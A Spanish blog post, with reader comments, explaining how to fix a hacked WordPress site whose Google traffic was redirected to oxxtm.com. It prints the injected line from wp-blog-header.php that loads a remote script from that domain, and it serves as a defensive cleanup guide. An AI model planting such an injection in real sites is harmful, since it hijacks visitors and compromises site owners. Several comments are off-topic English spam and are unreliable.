WordPress Hackeado redireccionando a oxxtm.com desde Google | Solución

Expondremos la solución ante un WordPress hackeado redireccionando a oxxtm.com desde Google.

Hemos encontrado como resolver este problema habitual en las web creadas mediante WordPress.

El porqué para escribir esta entrada ha sido por experiencia propia; recientemente en nuestro Blog TICExperto, registramos un descenso en las visitas a nuestros post sin motivo aparente… Sin llegar a conocer la causa del problema, conseguimos detectar los primeros indicios de WordPress Hackeado, consultando en el buscador de Google varias de nuestras Keyword para verificar el posicionamiento de nuestra web, detectamos que al hacer clic sobre nuestros contenidos en los resultados de las búsquedas, en algunos de ellos, no todos, nuestro enlace redirecciona automáticamente al domino oxxtm.com .

Wordpress Hackeado redireccionando a oxxtm.com desde Google Solución
WordPress Hackeado redireccionando a oxxtm.com desde Google Solución

A partir de aquí comenzaron nuestras primeras indagaciones con resultados poco alentadores… Al buscar en Google sobre ello, apenas encontramos entradas en español relacionadas con nuestro problema. Encontrábamos multitud de consultas sobre Hackeo Wordepress en las que varios administradores de blog detectaban que su publicidad había sido secuestrada por otros sponsor, otros habían perdido el control sobre su blog ya que se lo habían robado, incluso el borrado total de los mismos por hacker o software malicioso. Aprovechando esta labor de investigación, hemos recopilado varios consejos de seguridad que cualquier administrador debemos seguir para solucionar un WordPress Hackeado  redireccionando a oxxtm.com desde Google.

Finalmente y revisando documentación en inglés de este foro, hemos encontrado la solución para el WordPress Hackeado redirecciona a oxxtm.com desde Google :

Hemos de localizar el fichero wp-blog-header.php que se encuentra en nuestra carpeta raiz del ftp donde hemos instalado nuestro WordPress.

Este era nuestro fichero wp-blog-header.php antes de ser infectado:

wp-blog-header.php
wp-blog-header.php

Cuando localizamos el fichero vimos que la fecha de modificación era posterior el resto de ficheros de instalación de WordPress, estos ficheros no deberían modificarse por si solo a menos que cambies algún tipo de configuración avanzada en tu Blog; en nuestro caso estábamos seguros que no había sido así. Al abrir el fichero wp-blog-header.php nos encontramos con la siguiente imagen:

wp-blog-header php hackeado
wp-blog-header php hackeado

Nos encontramos en la fila nº 1 la siguiente modificación:

echo «<.script type=’text/javascript’ src=’http://www.oxxtm.com/images/wp-logo.js’></script>»; 

Ahora para solucionar el error solo tenemos que borrar esta línea de código pero OJO muy importante no borrar el comienzo: <?php  sin esto vuestro WordPress Hackeado dejará de funcionar completamente y tendréis un grave problema.

Si borráis solo el código mencionado recuperaréis el control total de vuestro blog.

Ahora debes tener en cuenta que si no pones remedio al origen del problema, de la misma forma que fue Hackeado podría volver a serlo en cualquier momento.

Para conocer cuales han sido las medidas que hemos adoptado en nuestro blog para evitar que se vuelva a repetir el problema solo tienes que suscribirte y recibirás gratuitamente en tu e-mail nuestra próxima publicación sobre seguridad WordPress de forma totalmente gratuita.

22 comentarios en «WordPress Hackeado redireccionando a oxxtm.com desde Google | Solución»

  • el 8 mayo, 2021 a las 00:51
    Enlace permanente

    all the time i used to read smaller content that as well clear their motive, and that is also happening with
    this piece of writing which I am reading at this time.

    Respuesta
  • el 7 mayo, 2021 a las 13:46
    Enlace permanente

    Undeniably consider that that you stated. Your favourite justification appeared to be at the web
    the simplest factor to bear in mind of. I say to
    you, I definitely get irked while other folks consider concerns that
    they plainly don’t recognize about. You controlled to
    hit the nail upon the top as neatly as outlined out
    the entire thing without having side effect , people could take a signal.
    Will probably be back to get more. Thanks

    Respuesta
  • el 29 abril, 2021 a las 16:44
    Enlace permanente

    Hey there just wanted to give you a quick heads up.
    The words in your post seem to be running off the screen in Opera.
    I’m not sure if this is a formatting issue or something to do with web browser compatibility but I thought I’d post to let you know.
    The design and style look great though! Hope you get the issue resolved soon. Cheers

    Respuesta
  • el 29 abril, 2021 a las 09:14
    Enlace permanente

    I am sure this post has touched all the internet viewers, its really
    really nice post on building up new weblog.

    Respuesta
  • el 29 abril, 2021 a las 02:47
    Enlace permanente

    Hey! I understand this is sort of off-topic however I needed to ask.

    Does running a well-established website such as yours require
    a lot of work? I’m completely new to operating a blog but I do write in my journal everyday.
    I’d like to start a blog so I can share my experience and views
    online. Please let me know if you have any recommendations or tips for
    new aspiring blog owners. Appreciate it!

    Respuesta
  • el 28 abril, 2021 a las 05:49
    Enlace permanente

    Hey there, You’ve done a great job. I’ll certainly digg it and personally
    recommend to my friends. I’m confident they will
    be benefited from this website.

    Respuesta
  • el 14 abril, 2021 a las 21:17
    Enlace permanente

    Hi everyone, it’s my first go to see at this web site,
    and piece of writing is truly fruitful for me, keep up
    posting these articles or reviews. 0mniartist asmr

    Respuesta
  • el 11 abril, 2021 a las 12:17
    Enlace permanente

    Today, I went to the beach with my children. I found a
    sea shell and gave it to my 4 year old daughter and said «You can hear the ocean if you put this to your ear.» She placed the shell to her ear and screamed.
    There was a hermit crab inside and it pinched her ear. She never wants to go back!
    LoL I know this is totally off topic but I had to tell someone!
    0mniartist asmr

    Respuesta
  • el 22 enero, 2016 a las 20:40
    Enlace permanente

    Hola.

    Me pasa el mismo error, pero yo borro todos los archivos de mi página y los vuelvo a instalar (obviamente limpios).
    Se limpia la página durante aproximadamente unos 30-40 min, y vuelve al mismo error, también ya estuve buscando esa línea en »wp-blog-header.php» y no me aparece.
    He tenido este problema durante 1 semana.

    Respuesta
    • el 23 enero, 2016 a las 10:46
      Enlace permanente

      Hola Pitu, casi con total seguridad te han hackeao alguna de las contraseñas de acceso a tu wordpress, al hosting o a la base de datos. Entonces, aunque realices los cambios correctamente tienes algún Malware que vuelve a modificarlo.
      WordPress Hackeado Solución
      Lee nuestra nueva entrada sobre WordPress Hackeado, si después de seguir nuestros pasos no tienes la solución, comenta y estaremos encantados de seguir buscando alguna solución.
      Muchas gracias por seguir nuestro blog.

      Respuesta
  • el 21 enero, 2016 a las 21:22
    Enlace permanente

    Hola me encuentro en la misma situación, del hackeo con redireccionamiento al sitio oxxtm, solo que a mi no me aparece esa linea, en el archivo «wo-blog-header», saben de alguna otro archivo donde pueda encontrar, el redireccionamiento?

    Saludos!!! espero puedan apoyarme a la brevedad ^_^

    Respuesta
    • el 23 enero, 2016 a las 10:40
      Enlace permanente

      Hola Ricardo, gracias por seguir nuestro blog, hemos ampliado la información en una nueva entrada: WordPress Hackeado Solución

      Instala los plugin Plugin iThemes Security y el Securi Security además hemos profundizado en otras causas por las que te pueden haber hackeado WordPress.

      Respuesta
  • el 13 enero, 2016 a las 13:27
    Enlace permanente

    ¿Qué medidas habéis tomado para que no vuelvan a hackear el blog?
    He intentado suscribirme pero no se a que.
    Gracias.

    Respuesta
    • el 15 enero, 2016 a las 09:51
      Enlace permanente

      Hola Edu, muchas gracias por tu interés. Estamos redactando un nuevo post sobre las medidas preventivas que hemos adoptado en nuestro blog para dar una solución al WordPress Hackeado.
      Si te has suscrito a nuestro blog, recibiras el atículo en tu bandeja de entrada cuando lo publiquemos.
      Saludos.

      Respuesta

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *